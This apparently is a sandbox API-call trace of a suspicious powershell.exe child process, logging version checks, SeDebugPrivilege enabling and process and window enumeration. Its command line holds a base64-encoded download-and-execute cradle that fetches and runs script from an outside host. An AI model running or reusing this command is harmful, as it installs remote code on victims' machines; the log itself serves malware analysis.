	[0930.341] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b7439a0, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0930.341] CoTaskMemFree (pv=0x1b7439a0) 
	[0939.395] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c75d7f0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.395] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c75d870, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.395] SetErrorMode (uMode=0x1) returned 0x1
	[0939.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0954.567] SetErrorMode (uMode=0x1) returned 0x1
	[0954.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c75b180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c75b0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c75b0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c75b0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0955.632] CoTaskMemAlloc (cb=0x104) returned 0x1b7439a0
	[0955.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7439a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.633] CoTaskMemFree (pv=0x1b7439a0) 

Thread:
	id = 2007
	os_tid = 0x274c


Thread:
	id = 2015
	os_tid = 0x276c


Thread:
	id = 2020
	os_tid = 0x2780

	[0905.054] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0905.058] ResetEvent (hEvent=0x388) returned 1

Thread:
	id = 2050
	os_tid = 0x27f8


Process:
	id = "133"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6759a000"
	os_pid = "0x150c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "34"
	os_parent_pid = "0x534"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 675
	os_tid = 0x1510

	[0433.697] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0815.267] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0819.445] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0819.446] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0819.446] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0819.446] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0846.249] GetVersionExW (in: lpVersionInformation=0xcddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0846.251] GetVersionExW (in: lpVersionInformation=0xcddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0847.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcda80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.259] GetVersionExW (in: lpVersionInformation=0xcdb30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0847.260] SetErrorMode (uMode=0x1) returned 0x1
	[0847.261] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdc90 | out: lpFileInformation=0xcdc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0847.262] SetErrorMode (uMode=0x1) returned 0x1
	[0847.265] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdf00 | out: lpdwHandle=0xcdf00) returned 0x94c
	[0847.268] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ea72a0 | out: lpData=0x2ea72a0) returned 1
	[0847.275] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2ea733c, puLen=0xcde70) returned 1
	[0847.278] lstrlenW (lpString="䅁") returned 1
	[0848.147] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea7418, puLen=0xcdde0) returned 1
	[0848.147] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0848.150] CoTaskMemAlloc (cb=0x2e) returned 0x338890
	[0848.150] lstrcpyW (in: lpString1=0x338890, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0848.151] CoTaskMemFree (pv=0x338890) 
	[0848.151] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea746c, puLen=0xcdde0) returned 1
	[0848.151] lstrlenW (lpString="System.Management.Automation") returned 28
	[0848.151] CoTaskMemAlloc (cb=0x3c) returned 0x2e7bd0
	[0848.151] lstrcpyW (in: lpString1=0x2e7bd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0848.151] CoTaskMemFree (pv=0x2e7bd0) 
	[0848.151] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea74c8, puLen=0xcdde0) returned 1
	[0848.151] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.151] CoTaskMemAlloc (cb=0x20) returned 0x339f20
	[0848.151] lstrcpyW (in: lpString1=0x339f20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.152] CoTaskMemFree (pv=0x339f20) 
	[0848.152] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea7508, puLen=0xcdde0) returned 1
	[0848.152] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.152] CoTaskMemAlloc (cb=0x44) returned 0x2e7bd0
	[0848.152] lstrcpyW (in: lpString1=0x2e7bd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.152] CoTaskMemFree (pv=0x2e7bd0) 
	[0848.152] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea7570, puLen=0xcdde0) returned 1
	[0848.152] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0848.152] CoTaskMemAlloc (cb=0x76) returned 0x2cef90
	[0848.152] lstrcpyW (in: lpString1=0x2cef90, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0848.152] CoTaskMemFree (pv=0x2cef90) 
	[0848.152] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea760c, puLen=0xcdde0) returned 1
	[0848.152] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.152] CoTaskMemAlloc (cb=0x44) returned 0x2e7bd0
	[0848.152] lstrcpyW (in: lpString1=0x2e7bd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.152] CoTaskMemFree (pv=0x2e7bd0) 
	[0848.152] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea7670, puLen=0xcdde0) returned 1
	[0848.152] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0848.152] CoTaskMemAlloc (cb=0x58) returned 0x28aeb0
	[0848.153] lstrcpyW (in: lpString1=0x28aeb0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0848.153] CoTaskMemFree (pv=0x28aeb0) 
	[0848.153] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea76ec, puLen=0xcdde0) returned 1
	[0848.153] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.153] CoTaskMemAlloc (cb=0x20) returned 0x339f20
	[0848.153] lstrcpyW (in: lpString1=0x339f20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.153] CoTaskMemFree (pv=0x339f20) 
	[0848.153] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x2ea7394, puLen=0xcdde0) returned 1
	[0848.153] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0848.153] CoTaskMemAlloc (cb=0x66) returned 0x32e350
	[0848.153] lstrcpyW (in: lpString1=0x32e350, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0848.153] CoTaskMemFree (pv=0x32e350) 
	[0848.153] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x0, puLen=0xcdde0) returned 0
	[0848.153] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x0, puLen=0xcdde0) returned 0
	[0848.153] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdde8, puLen=0xcdde0 | out: lplpBuffer=0xcdde8*=0x0, puLen=0xcdde0) returned 0
	[0848.153] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcddb8, puLen=0xcddb0 | out: lplpBuffer=0xcddb8*=0x2ea733c, puLen=0xcddb0) returned 1
	[0848.155] CoTaskMemAlloc (cb=0x204) returned 0x2d2010
	[0848.155] VerLanguageNameW (in: wLang=0x0, szLang=0x2d2010, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0848.156] CoTaskMemFree (pv=0x2d2010) 
	[0848.156] VerQueryValueW (in: pBlock=0x2ea72a0, lpSubBlock="\\", lplpBuffer=0xcde08, puLen=0xcde00 | out: lplpBuffer=0xcde08*=0x2ea72c8, puLen=0xcde00) returned 1
	[0848.167] GetCurrentProcessId () returned 0x150c
	[0848.188] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xccd30 | out: lpLuid=0xccd30*(LowPart=0x14, HighPart=0)) returned 1
	[0849.139] GetCurrentProcess () returned 0xffffffffffffffff
	[0849.140] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccd50 | out: TokenHandle=0xccd50*=0x2e4) returned 1
	[0849.141] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2eaab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0849.143] CloseHandle (hObject=0x2e4) returned 1
	[0849.147] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150c) returned 0x2e4
	[0849.156] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2eaab80, cb=0x200, lpcbNeeded=0xcdd68 | out: lphModule=0x2eaab80, lpcbNeeded=0xcdd68) returned 1
	[0849.162] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2eaadf0, cb=0x18 | out: lpmodinfo=0x2eaadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0849.163] CoTaskMemAlloc (cb=0x804) returned 0x33aa20
	[0849.164] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x33aa20, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0849.164] CoTaskMemFree (pv=0x33aa20) 
	[0849.165] CoTaskMemAlloc (cb=0x804) returned 0x33aa20
	[0849.165] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x33aa20, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0849.165] CoTaskMemFree (pv=0x33aa20) 
	[0849.165] CloseHandle (hObject=0x2e4) returned 1
	[0850.399] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x150c) returned 0x2e4
	[0850.400] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0xcde98 | out: lpExitCode=0xcde98*=0x103) returned 1
	[0850.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12eab088, Length=0x20000, ResultLength=0xcde60 | out: SystemInformation=0x12eab088, ResultLength=0xcde60*=0x45d08) returned 0xc0000004
	[0850.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ecb0b8, Length=0x48508, ResultLength=0xcde60 | out: SystemInformation=0x12ecb0b8, ResultLength=0xcde60*=0x45d08) returned 0x0
	[0852.251] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.251] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x558
	[0852.251] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x538
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x778
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x778
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.252] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x460
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x23a8
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1f24
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x21ec
	[0852.253] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x2320
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1fd4
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1880
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b18
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1d6c
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x233c
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x2368
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x2124
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x22f0
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x22ac
	[0852.254] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1cdc
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x10f0
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1f18
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x20a8
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x2004
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1f88
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1f84
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x2050
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1e04
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1ecc
	[0852.255] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1e64
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b58
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1e94
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1e28
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1df8
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1da8
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1c70
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x163c
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1a10
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x186c
	[0852.256] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1d74
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4c8
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1960
